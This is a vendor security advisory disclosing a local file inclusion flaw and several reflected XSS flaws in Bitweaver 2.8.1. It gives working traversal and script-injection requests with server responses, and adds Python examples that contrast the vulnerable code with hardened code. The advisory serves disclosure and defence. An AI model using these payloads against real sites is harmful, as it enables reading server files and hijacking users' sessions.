Trustwave SpiderLabs Security Advisory TWSL2012-016:
Multiple Vulnerabilities in Bitweaver

Published: 10/23/2012
Version: 1.0

Vendor: Bitweaver (http://www.bitweaver.org/)
Product: Bitweaver
Version affected: 2.8.1 and earlier versions

Product description:
Bitweaver is a free and open source web application framework and content
management system. Bitweaver is written in PHP and uses Firebird as a
database backend.

Credit: David Aaron and Jonathan Claudius of Trustwave SpiderLabs

|
Finding 1: Local File Inclusion Vulnerability
CVE: CVE-2012-5192

The 'overlay_type' parameter of the 'gmap/view_overlay.php' page in
Bitweaver is vulnerable to local file inclusion: the value is used to build
the path of a file to include without being confined to the intended
directory.

This vulnerability can be demonstrated by traversing to a known readable
file on the web server file system, such as /etc/passwd.

Example:

Performing LFI on the 'overlay_type' parameter

#Request

http://A.B.C.D/bitweaver/gmap/view_overlay.php?overlay_type=..%2F..%2F..%2F..%2F..%2F..%2F..%2F/etc/passwd%00

#Response

root:x:0:0:root:/root:/bin/bash
<snip>

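The following is an added example and not Bitweaver's code. It decodes the
advisory's overlay_type payload, shows how an unchecked path build turns it
into /etc/passwd, and contrasts a resolver that combines an allowlist, a NUL
check and a realpath containment check. The include directory, the ".tpl"
suffix and the allowlist are assumptions; the response check at the end is
what a tester runs against the page body to confirm the leak.

```python
"""Added example, not Bitweaver's code: decode the advisory's overlay_type
payload, show how an unchecked path build lets it reach /etc/passwd, and
contrast an allowlist-plus-realpath resolver that rejects it. The include
directory, the ".tpl" suffix and the allowlist are assumptions."""
import os
import re
from urllib.parse import unquote

# Payload from the advisory request, exactly as it appears in the query string.
LFI_PAYLOAD = "..%2F..%2F..%2F..%2F..%2F..%2F..%2F/etc/passwd%00"

# Assumed location of the overlay templates; not taken from Bitweaver.
OVERLAY_DIR = "/var/www/bitweaver/gmap/overlays"
ALLOWED_OVERLAYS = {"marker", "polyline", "polygon"}   # assumed allowlist


def decode_param(raw: str) -> str:
    """URL-decode once, as PHP does for $_GET: %2F becomes '/', %00 becomes NUL."""
    return unquote(raw)


def vulnerable_resolve(overlay_type: str, base_dir: str = OVERLAY_DIR,
                       suffix: str = ".tpl") -> str:
    """Assumed vulnerable pattern: base_dir . '/' . $overlay_type . '.tpl'.

    Emulates PHP before 5.3.4, where the NUL in the string terminated the
    underlying C path and discarded the appended suffix. PHP 5.3.4 and later
    reject paths containing NUL, so the %00 only matters on older runtimes
    (or when no suffix is appended at all).
    """
    path = base_dir + "/" + overlay_type + suffix
    nul = path.find("\x00")
    if nul != -1:
        path = path[:nul]
    # normpath collapses the "../" sequences; on POSIX, extra ".." above "/" is dropped.
    return os.path.normpath(path)


def hardened_resolve(overlay_type: str, base_dir: str = OVERLAY_DIR,
                     suffix: str = ".tpl") -> str:
    """Three independent checks: no NUL, name on the allowlist, resolved path
    still inside base_dir after symlinks are followed."""
    if "\x00" in overlay_type:
        raise ValueError("NUL byte in overlay_type")
    if overlay_type not in ALLOWED_OVERLAYS:
        raise ValueError("overlay_type is not an allowed overlay name")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, overlay_type + suffix))
    if os.path.commonpath([base, target]) != base:
        raise ValueError("resolved path escapes the overlay directory")
    return target


# A passwd entry: name, password field, numeric uid and gid, then GECOS.
PASSWD_LINE = re.compile(r"^[a-z_][a-z0-9_-]*:[^:\n]*:\d+:\d+:", re.M)


def looks_like_passwd(body: str) -> bool:
    """Response check for the test: a passwd-format line inside an HTML page
    means the include read a file it should not have."""
    return bool(PASSWD_LINE.search(body))


if __name__ == "__main__":
    decoded = decode_param(LFI_PAYLOAD)
    print("decoded parameter:", repr(decoded))
    print("vulnerable resolver opens:", vulnerable_resolve(decoded))
    try:
        hardened_resolve(decoded)
    except ValueError as exc:
        print("hardened resolver rejects it:", exc)
    print("hardened resolver accepts 'marker':", hardened_resolve("marker"))
    # Constructed response body modelled on the advisory's <snip> output.
    print("leak detected:", looks_like_passwd("root:x:0:0:root:/root:/bin/bash\n"))
```

The allowlist is the control that matters: realpath containment alone still
lets a user include any file under the overlay directory, and a NUL check
alone does nothing against traversal once PHP no longer needs the terminator.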
|
Finding 2: Multiple XSS Vulnerabilities in Bitweaver
CVE: CVE-2012-5193

Multiple reflected cross-site scripting (XSS) vulnerabilities have been
discovered that allow a remote unauthenticated attacker to execute arbitrary
script in the browser of any user who opens a crafted link or submits a
crafted form. The script runs in the context of the Bitweaver site in the
victim's browser, not on the server itself.

Examples:

The following proofs of concept illustrate that Bitweaver 2.8.1 is
vulnerable to XSS. In each case the request value is reflected into the
response without output encoding.

|
1. Performing XSS on stats/index.php (payload supplied as path info)

#Request

GET /bitweaver/stats/index.php/%22%3E%3Cscript%3Ealert('XSS')%3B%3C%2Fscript%3E HTTP/1.0

#Response

HTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:42:34 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
Set-Cookie: BWSESSION=4gmfnd86ahtvn34v5oejgivvh3; path=/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

[truncated due to length]

|
2. Performing XSS on /newsletters/edition.php (payload supplied as path info)

#Request

GET /bitweaver/newsletters/edition.php/%22%3E%3Cscript%3Ealert('XSS')%3B%3C%2Fscript%3E HTTP/1.0

#Response

HTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:42:02 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
Set-Cookie: BWSESSION=ajdjp797r7atral75rmlhcgs63; path=/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

[truncated due to length]

|
3. Performing XSS on the 'username' parameter of /users/remind_password.php

#Request

POST /bitweaver/users/remind_password.php HTTP/1.1
Host: A.B.C.D
Content-Type: application/x-www-form-urlencoded
Content-Length: 192

username=%22%3E%3Cscript%3Ealert('XSS')%3B%3C%2Fscript%3E&remind=Reset+%28password%29

#Response

HTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:53:11 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
Set-Cookie: BWSESSION=i0ktqmt3497thag552t9ds78v4; path=/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 15974

[truncated due to length]

<snip>
Invalid or unknown username: "><script>alert('XSS');</script></p></div>Please follow the instructions in the email.
<snip>

|
4. Performing XSS on the 'days' parameter on /stats/index.php

#Request

POST /bitweaver/stats/index.php HTTP/1.1
Host: A.B.C.D
Content-Type: application/x-www-form-urlencoded
Content-Length: 177

days=%22%3E%3Cscript%3Ealert('XSS')%3B%3C%2Fscript%3E&pv_chart=Display

#Response

HTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:55:53 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
Set-Cookie: BWSESSION=dqdvcnmql8jhngp0tphseh1qh4; path=/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 24778

[truncated due to length]

<snip>
<img src="/stats/pv_chart.php?days="><script>alert('XSS');</script>" alt="Site Usage Statistics" />
<snip>

|
5. Performing XSS on the 'login' parameter on /users/register.php (enter
"><IFRAME src="https://www.trustwave.com" height="1000px"
width="1000px"> into the "Username" field of the registration form):

http://A.B.C.D/bitweaver/users/register.php

|
6. Performing XSS on the 'highlight' parameter (note that the payload is
URL-encoded twice, so a filter that decodes only once never sees the
angle brackets):

#Request

GET /bitweaver/?highlight=%2522%253E%253Cscript%253Ealert('XSS')%253B%253C%252Fscript%253E HTTP/1.0

#Response

HTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:59:09 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
Set-Cookie: BWSESSION=ama93jqlojmi385plkft5opl64; path=/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

[truncated due to length]

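The following is an added example and not Bitweaver's code. It reproduces
the attribute-context injection visible in the PoC 4 response, renders the
same template with and without HTML output encoding, and includes the two
checks a tester applies to a response: whether the fully decoded payload is
reflected verbatim, and how many script elements the page now contains. It
also shows why the double-encoded PoC 6 payload needs two decode rounds.
The <img> template copies the markup in the PoC 4 response; the rendering
functions are assumptions, not Bitweaver's implementation.

```python
"""Added example, not Bitweaver's code: the attribute-context reflection seen
in PoC 4, rendered with and without output encoding, plus the response
checks used to confirm it. The template copies the PoC 4 markup; the
rendering functions are assumptions."""
import html
import re
from urllib.parse import unquote

# Payloads from the advisory requests, still URL-encoded as sent.
XSS_PAYLOAD = "%22%3E%3Cscript%3Ealert('XSS')%3B%3C%2Fscript%3E"                        # PoCs 1-4
HIGHLIGHT_PAYLOAD = "%2522%253E%253Cscript%253Ealert('XSS')%253B%253C%252Fscript%253E"  # PoC 6

# Markup from the PoC 4 response, with the reflected value as a placeholder.
TEMPLATE = '<img src="/stats/pv_chart.php?days={days}" alt="Site Usage Statistics" />'


def decode_until_stable(raw: str, max_rounds: int = 5):
    """Decode repeatedly until nothing changes; returns (value, rounds needed).
    PoC 6 needs two rounds, so a filter that decodes once never sees the '<'."""
    value, rounds = raw, 0
    while rounds < max_rounds:
        nxt = unquote(value)
        if nxt == value:
            break
        value, rounds = nxt, rounds + 1
    return value, rounds


def vulnerable_chart_img(days: str) -> str:
    """Interpolates the parameter straight into the src attribute. The leading
    double quote closes the attribute and the remainder becomes new markup."""
    return TEMPLATE.format(days=days)


def hardened_chart_img(days: str) -> str:
    """HTML-encode on output: quotes and angle brackets become entities, so the
    value can never leave the attribute. Validating that 'days' is a small
    integer would be a second, independent layer."""
    return TEMPLATE.format(days=html.escape(days, quote=True))


def reflected_unescaped(raw_payload: str, body: str) -> bool:
    """True when the fully decoded payload appears verbatim in the response."""
    decoded, _ = decode_until_stable(raw_payload)
    return decoded in body


def script_tag_count(body: str) -> int:
    """How many <script> start tags a browser would parse from this body."""
    return len(re.findall(r"<script\b", body, re.I))


if __name__ == "__main__":
    days, _ = decode_until_stable(XSS_PAYLOAD)
    bad = vulnerable_chart_img(days)
    good = hardened_chart_img(days)
    print(bad)    # identical to the <img> line in the PoC 4 response
    print(good)
    print("scripts in vulnerable page:", script_tag_count(bad))
    print("scripts in hardened page:", script_tag_count(good))
    print("PoC 6 payload decode rounds:", decode_until_stable(HIGHLIGHT_PAYLOAD)[1])
```

Encoding must match the context the value lands in: html.escape with
quote=True is right for an attribute delimited by double quotes, which is the
case here, but a value placed inside a script block or a URL would need a
different encoder.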
|
Remediation Steps:
The vendor has released a fix to address the Local File Inclusion
vulnerability (finding 1) and several of the Cross-Site Scripting
vulnerabilities (finding 2) in Bitweaver 3.1. Additional fixes for the
remaining Cross-Site Scripting vulnerabilities were made in commit c3bef6f
on the development branch. Users are advised to download the latest release
of Bitweaver from http://github.com/bitweaver to address the above issues.

These issues can also be mitigated with technologies such as Web
Application Firewalls (WAF) or Intrusion Prevention Systems (IPS). Note that
the 'highlight' proof of concept above carries a double URL-encoded
payload, so any such filtering control must fully normalise input before
matching, and it remains a compensating control rather than a fix.
Vulnerability scanners and Intrusion Detection Systems (IDS) can often
detect the presence of Local File Inclusion and XSS vulnerabilities.
Trustwave technologies that address these issues include the following.

ModSecurity (http://www.modsecurity.org/) has added rules for these issues
to the commercial rules feed, available as part of the SpiderLabs
ModSecurity rules feed.

Trustwave's vulnerability scanning solution, TrustKeeper
(https://www.trustwave.com/trustKeeper.php), has been updated to detect
affected versions.

|
References
http://www.bitweaver.org/
http://blog.spiderlabs.com/

|
Vendor Communication Timeline:
04/26/12 - Initial communications with vendor
05/14/12 - Vulnerability disclosed to vendor
05/30/12 - Vendor acknowledges version 3.0 fixes issues
06/07/12 - Contact vendor regarding incomplete fixes in 3.0
09/07/12 - Vendor publishes version 3.1
10/10/12 - Contact vendor regarding incomplete fixes in 3.1
10/23/12 - Advisory published

|
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com

About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.